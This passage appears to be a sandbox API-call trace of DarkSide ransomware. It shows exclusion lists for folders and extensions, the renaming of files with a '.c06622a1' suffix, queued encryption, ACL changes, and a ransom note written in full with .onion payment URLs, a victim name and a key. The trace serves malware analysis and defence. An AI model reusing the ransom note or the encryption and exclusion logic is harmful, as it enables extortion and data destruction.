(_Str1="msc", _Str2="url") returned -8 [0150.140] wcslen (_String="msc") returned 0x3 [0150.140] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.140] wcslen (_String="msp") returned 0x3 [0150.140] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.140] wcslen (_String="msstyles") returned 0x8 [0150.140] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.140] wcslen (_String="msu") returned 0x3 [0150.140] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.140] wcslen (_String="nls") returned 0x3 [0150.140] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.140] wcslen (_String="nomedia") returned 0x7 [0150.140] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.140] wcslen (_String="ocx") returned 0x3 [0150.140] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.140] wcslen (_String="prf") returned 0x3 [0150.140] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.140] wcslen (_String="ps1") returned 0x3 [0150.140] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.140] wcslen (_String="rom") returned 0x3 [0150.140] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.140] wcslen (_String="rtp") returned 0x3 [0150.140] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.140] wcslen (_String="scr") returned 0x3 [0150.140] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.141] wcslen (_String="shs") returned 0x3 [0150.141] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.141] wcslen (_String="spl") returned 0x3 [0150.141] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.141] wcslen (_String="sys") returned 0x3 [0150.141] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.141] wcslen (_String="theme") returned 0x5 [0150.141] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.141] wcslen (_String="themepack") returned 0x9 [0150.141] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.141] wcslen (_String="wpx") returned 0x3 [0150.141] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.141] wcslen (_String="lock") returned 0x4 [0150.141] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.141] wcslen (_String="key") returned 0x3 [0150.141] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.141] wcslen (_String="hta") returned 0x3 [0150.141] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.141] wcslen (_String="msi") returned 0x3 [0150.141] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.141] wcslen (_String="pdb") returned 0x3 [0150.141] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.141] wcslen (_String="sql") returned 0x3 [0150.141] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.141] wcslen (_String="sqlite") returned 0x6 [0150.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0150.141] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.141] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0150.141] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0150.141] wcscpy (in: _Dest=0x450010e, _Source="Microsoft Store.url" | out: _Dest="Microsoft Store.url") returned="Microsoft Store.url" [0150.141] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x80) returned 1 [0150.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0150.142] SetFilePointerEx (in: hFile=0x668, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.142] CloseHandle (hObject=0x668) returned 1 [0150.142] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.142] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" [0150.142] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 0x52 [0150.142] wcscpy (in: _Dest=0x451013c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.142] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.c06622a1"), dwFlags=0x8) returned 1 [0150.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x668 [0150.144] CreateIoCompletionPort (FileHandle=0x668, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.144] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0150.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x448b2f84 [0150.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5537d5a1 [0150.150] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57f63136 [0150.150] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72389a28 [0150.150] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x353aec0a [0150.150] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5db26146 [0150.150] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x287b0988 [0150.150] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd949334 [0150.153] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x1cc8c391 [0150.153] RtlComputeCrc32 (PartialCrc=0xc391, Buffer=0x4700094, Length=0x80) returned 0x19d5dc7d [0150.153] RtlComputeCrc32 (PartialCrc=0xdc7d, Buffer=0x4700094, Length=0x80) returned 0x8e7f6849 [0150.153] RtlComputeCrc32 (PartialCrc=0x6849, Buffer=0x4700094, Length=0x80) returned 0x466a039a [0150.153] RtlComputeCrc32 (PartialCrc=0x39a, Buffer=0x4700094, Length=0x80) returned 0x6017a53f [0150.153] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0150.153] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.153] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.153] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd811b260, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd811b260, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd811b260, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.153] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.153] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.153] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0150.153] _wcsicmp (_Str1="backup", _Str2="Microsoft Websites") returned -11 [0150.153] wcslen (_String="backup") returned 0x6 [0150.153] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0150.153] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0150.153] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0150.153] _wcsicmp (_Str1="$recycle.bin", _Str2="MSN Websites") returned -73 [0150.153] wcslen (_String="$recycle.bin") returned 0xc [0150.153] _wcsicmp (_Str1="config.msi", _Str2="MSN Websites") returned -10 [0150.153] wcslen (_String="config.msi") returned 0xa [0150.153] _wcsicmp (_Str1="$windows.~bt", _Str2="MSN Websites") returned -73 [0150.153] wcslen (_String="$windows.~bt") returned 0xc [0150.153] _wcsicmp (_Str1="$windows.~ws", _Str2="MSN Websites") returned -73 [0150.154] wcslen (_String="$windows.~ws") returned 0xc [0150.154] _wcsicmp (_Str1="windows", _Str2="MSN Websites") returned 10 [0150.154] wcslen (_String="windows") returned 0x7 [0150.154] _wcsicmp (_Str1="appdata", _Str2="MSN Websites") returned -12 [0150.154] wcslen (_String="appdata") returned 0x7 [0150.154] _wcsicmp (_Str1="application data", _Str2="MSN Websites") returned -12 [0150.154] wcslen (_String="application data") returned 0x10 [0150.154] _wcsicmp (_Str1="boot", _Str2="MSN Websites") returned -11 [0150.154] wcslen (_String="boot") returned 0x4 [0150.154] _wcsicmp (_Str1="google", _Str2="MSN Websites") returned -6 [0150.154] wcslen (_String="google") returned 0x6 [0150.154] _wcsicmp (_Str1="mozilla", _Str2="MSN Websites") returned -4 [0150.154] wcslen (_String="mozilla") returned 0x7 [0150.154] _wcsicmp (_Str1="program files", _Str2="MSN Websites") returned 3 [0150.154] wcslen (_String="program files") returned 0xd [0150.154] _wcsicmp (_Str1="program files (x86)", _Str2="MSN Websites") returned 3 [0150.154] wcslen (_String="program files (x86)") returned 0x13 [0150.154] _wcsicmp (_Str1="programdata", _Str2="MSN Websites") returned 3 [0150.154] wcslen (_String="programdata") returned 0xb [0150.154] _wcsicmp (_Str1="system volume information", _Str2="MSN Websites") returned 6 [0150.154] wcslen (_String="system volume information") returned 0x19 [0150.154] _wcsicmp (_Str1="tor browser", _Str2="MSN Websites") returned 7 [0150.154] wcslen (_String="tor browser") returned 0xb [0150.154] _wcsicmp (_Str1="windows.old", _Str2="MSN Websites") returned 10 [0150.154] wcslen (_String="windows.old") returned 0xb [0150.154] _wcsicmp (_Str1="intel", _Str2="MSN Websites") returned -4 [0150.154] wcslen (_String="intel") returned 0x5 [0150.154] _wcsicmp (_Str1="msocache", _Str2="MSN Websites") returned 1 [0150.154] wcslen (_String="msocache") returned 0x8 [0150.154] _wcsicmp (_Str1="perflogs", _Str2="MSN Websites") returned 3 [0150.154] wcslen (_String="perflogs") returned 0x8 [0150.154] _wcsicmp (_Str1="x64dbg", _Str2="MSN Websites") returned 11 [0150.154] wcslen (_String="x64dbg") returned 0x6 [0150.154] _wcsicmp (_Str1="public", _Str2="MSN Websites") returned 3 [0150.154] wcslen (_String="public") returned 0x6 [0150.154] _wcsicmp (_Str1="all users", _Str2="MSN Websites") returned -12 [0150.154] wcslen (_String="all users") returned 0x9 [0150.154] _wcsicmp (_Str1="default", _Str2="MSN Websites") returned -9 [0150.155] wcslen (_String="default") returned 0x7 [0150.155] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0150.155] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0150.155] wcscpy (in: _Dest=0x44b00c0, _Source="MSN Websites" | out: _Dest="MSN Websites") returned="MSN Websites" [0150.155] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0150.155] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0150.155] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0150.155] GetNamedSecurityInfoW () returned 0x0 [0150.155] SetEntriesInAclW () returned 0x0 [0150.155] SetNamedSecurityInfoW () returned 0x0 [0150.159] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57bf8) returned 1 [0150.159] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.159] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 1 [0150.159] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.159] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.159] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.160] CloseHandle (hObject=0x678) returned 1 [0150.161] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0150.161] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="" [0150.161] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 0x39 [0150.161] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0150.161] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd81d9940, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd81d9940, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.161] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0150.161] _wcsicmp (_Str1="MSN Autos.url", _Str2="README.c06622a1.TXT") returned -5 [0150.161] wcsstr (_Str="MSN Autos.url", _SubStr="README") returned 0x0 [0150.161] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Autos.url") returned -12 [0150.161] wcslen (_String="autorun.inf") returned 0xb [0150.161] _wcsicmp (_Str1="boot.ini", _Str2="MSN Autos.url") returned -11 [0150.161] wcslen (_String="boot.ini") returned 0x8 [0150.161] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Autos.url") returned -11 [0150.161] wcslen (_String="bootfont.bin") returned 0xc [0150.161] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Autos.url") returned -11 [0150.161] wcslen (_String="bootsect.bak") returned 0xc [0150.161] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Autos.url") returned -9 [0150.161] wcslen (_String="desktop.ini") returned 0xb [0150.161] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Autos.url") returned -4 [0150.161] wcslen (_String="iconcache.db") returned 0xc [0150.161] _wcsicmp (_Str1="ntldr", _Str2="MSN Autos.url") returned 1 [0150.162] wcslen (_String="ntldr") returned 0x5 [0150.162] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Autos.url") returned 1 [0150.162] wcslen (_String="ntuser.dat") returned 0xa [0150.162] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Autos.url") returned 1 [0150.162] wcslen (_String="ntuser.dat.log") returned 0xe [0150.162] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Autos.url") returned 1 [0150.162] wcslen (_String="ntuser.ini") returned 0xa [0150.162] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Autos.url") returned 7 [0150.162] wcslen (_String="thumbs.db") returned 0x9 [0150.162] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.162] wcslen (_String="386") returned 0x3 [0150.162] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.162] wcslen (_String="adv") returned 0x3 [0150.162] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.162] wcslen (_String="ani") returned 0x3 [0150.162] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.162] wcslen (_String="bat") returned 0x3 [0150.162] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.162] wcslen (_String="bin") returned 0x3 [0150.162] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.162] wcslen (_String="cab") returned 0x3 [0150.162] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.162] wcslen (_String="cmd") returned 0x3 [0150.162] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.162] wcslen (_String="com") returned 0x3 [0150.162] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.162] wcslen (_String="cpl") returned 0x3 [0150.162] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.162] wcslen (_String="cur") returned 0x3 [0150.162] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.162] wcslen (_String="deskthemepack") returned 0xd [0150.162] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.162] wcslen (_String="diagcab") returned 0x7 [0150.162] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.162] wcslen (_String="diagcfg") returned 0x7 [0150.162] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.162] wcslen (_String="diagpkg") returned 0x7 [0150.163] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.163] wcslen (_String="dll") returned 0x3 [0150.163] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.163] wcslen (_String="drv") returned 0x3 [0150.163] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.163] wcslen (_String="exe") returned 0x3 [0150.163] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.163] wcslen (_String="hlp") returned 0x3 [0150.163] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.163] wcslen (_String="icl") returned 0x3 [0150.163] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.163] wcslen (_String="icns") returned 0x4 [0150.163] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.163] wcslen (_String="ico") returned 0x3 [0150.163] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.163] wcslen (_String="ics") returned 0x3 [0150.163] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.163] wcslen (_String="idx") returned 0x3 [0150.163] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.163] wcslen (_String="ldf") returned 0x3 [0150.163] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.163] wcslen (_String="lnk") returned 0x3 [0150.163] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.163] wcslen (_String="mod") returned 0x3 [0150.163] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.163] wcslen (_String="mpa") returned 0x3 [0150.163] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.163] wcslen (_String="msc") returned 0x3 [0150.163] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.163] wcslen (_String="msp") returned 0x3 [0150.163] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.163] wcslen (_String="msstyles") returned 0x8 [0150.163] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.163] wcslen (_String="msu") returned 0x3 [0150.163] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.163] wcslen (_String="nls") returned 0x3 [0150.163] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.163] wcslen (_String="nomedia") returned 0x7 [0150.163] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.164] wcslen (_String="ocx") returned 0x3 [0150.164] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.164] wcslen (_String="prf") returned 0x3 [0150.164] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.164] wcslen (_String="ps1") returned 0x3 [0150.164] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.164] wcslen (_String="rom") returned 0x3 [0150.164] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.164] wcslen (_String="rtp") returned 0x3 [0150.164] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.164] wcslen (_String="scr") returned 0x3 [0150.164] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.164] wcslen (_String="shs") returned 0x3 [0150.164] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.164] wcslen (_String="spl") returned 0x3 [0150.164] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.164] wcslen (_String="sys") returned 0x3 [0150.164] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.164] wcslen (_String="theme") returned 0x5 [0150.164] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.164] wcslen (_String="themepack") returned 0x9 [0150.164] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.164] wcslen (_String="wpx") returned 0x3 [0150.164] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.164] wcslen (_String="lock") returned 0x4 [0150.164] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.164] wcslen (_String="key") returned 0x3 [0150.164] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.164] wcslen (_String="hta") returned 0x3 [0150.164] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.164] wcslen (_String="msi") returned 0x3 [0150.164] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.164] wcslen (_String="pdb") returned 0x3 [0150.164] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.164] wcslen (_String="sql") returned 0x3 [0150.164] _wcsicmp (_Str1="sqlite", 